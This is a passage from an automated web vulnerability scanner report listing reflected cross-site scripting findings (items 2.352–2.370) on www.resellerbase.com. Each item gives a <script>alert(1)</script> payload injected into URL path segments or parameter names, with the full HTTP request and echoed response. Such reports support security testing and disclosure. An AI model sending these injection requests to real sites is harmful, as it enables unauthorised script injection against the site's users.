Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating20f3c<script>alert(1)</script>909308d1ea2/0.gif was not found on this server.</p>
...[SNIP]...

2.352. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f4f8c<script>alert(1)</script>631e1cdb0e2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/0.giff4f8c<script>alert(1)</script>631e1cdb0e2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/0.giff4f8c<script>alert(1)</script>631e1cdb0e2 was not found on this server.</p>
...[SNIP]...

2.353. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 22b9f<script>alert(1)</script>086a5136221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/0.gif?22b9f<script>alert(1)</script>086a5136221=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/0.gif?22b9f<script>alert(1)</script>086a5136221=1 was not found on this server.</p>
...[SNIP]...

2.354. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42705<script>alert(1)</script>ae8b0c52334 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult42705<script>alert(1)</script>ae8b0c52334/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult42705<script>alert(1)</script>ae8b0c52334/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.355. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a722<script>alert(1)</script>695381f05f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes1a722<script>alert(1)</script>695381f05f4/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes1a722<script>alert(1)</script>695381f05f4/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.356. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ebdf8<script>alert(1)</script>a614fa267f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosebdf8<script>alert(1)</script>a614fa267f0/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosebdf8<script>alert(1)</script>a614fa267f0/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.357. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ca8c<script>alert(1)</script>a0d261f18a0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images4ca8c<script>alert(1)</script>a0d261f18a0/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images4ca8c<script>alert(1)</script>a0d261f18a0/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.358. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d6c3e<script>alert(1)</script>6e698512bf1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/ratingd6c3e<script>alert(1)</script>6e698512bf1/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/ratingd6c3e<script>alert(1)</script>6e698512bf1/3half.gif was not found on this server.</p>
...[SNIP]...

2.359. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e72fa<script>alert(1)</script>57f75f8bca3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/3half.gife72fa<script>alert(1)</script>57f75f8bca3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/3half.gife72fa<script>alert(1)</script>57f75f8bca3 was not found on this server.</p>
...[SNIP]...

2.360. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 35060<script>alert(1)</script>4f37a1fb8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/3half.gif?35060<script>alert(1)</script>4f37a1fb8a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/3half.gif?35060<script>alert(1)</script>4f37a1fb8a7=1 was not found on this server.</p>
...[SNIP]...

2.361. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd735<script>alert(1)</script>0c3c375d60e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultcd735<script>alert(1)</script>0c3c375d60e/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultcd735<script>alert(1)</script>0c3c375d60e/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.362. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be1f0<script>alert(1)</script>c464813e621 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesbe1f0<script>alert(1)</script>c464813e621/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesbe1f0<script>alert(1)</script>c464813e621/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.363. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b752<script>alert(1)</script>a88cc6be903 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos5b752<script>alert(1)</script>a88cc6be903/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos5b752<script>alert(1)</script>a88cc6be903/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.364. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f71d<script>alert(1)</script>16cd9e08485 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images1f71d<script>alert(1)</script>16cd9e08485/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images1f71d<script>alert(1)</script>16cd9e08485/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.365. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9443<script>alert(1)</script>9f3832d302c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/ratingd9443<script>alert(1)</script>9f3832d302c/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/ratingd9443<script>alert(1)</script>9f3832d302c/4.gif was not found on this server.</p>
...[SNIP]...

2.366. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fd062<script>alert(1)</script>7771027ff46 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/4.giffd062<script>alert(1)</script>7771027ff46 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/4.giffd062<script>alert(1)</script>7771027ff46 was not found on this server.</p>
...[SNIP]...

2.367. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af551<script>alert(1)</script>dcce3eedae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/4.gif?af551<script>alert(1)</script>dcce3eedae=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/4.gif?af551<script>alert(1)</script>dcce3eedae=1 was not found on this server.</p>
...[SNIP]...

2.368. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1342a<script>alert(1)</script>ce94791fce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult1342a<script>alert(1)</script>ce94791fce/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult1342a<script>alert(1)</script>ce94791fce/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.369. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17d0d<script>alert(1)</script>b92fce46caa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes17d0d<script>alert(1)</script>b92fce46caa/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes17d0d<script>alert(1)</script>b92fce46caa/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.370. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8e78d<script>alert(1)</script>9bfecd83daf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos8e78d<script>alert(1)</script>9bfecd83daf/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos8e78d<script>alert(1)</script>9bfecd83daf/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

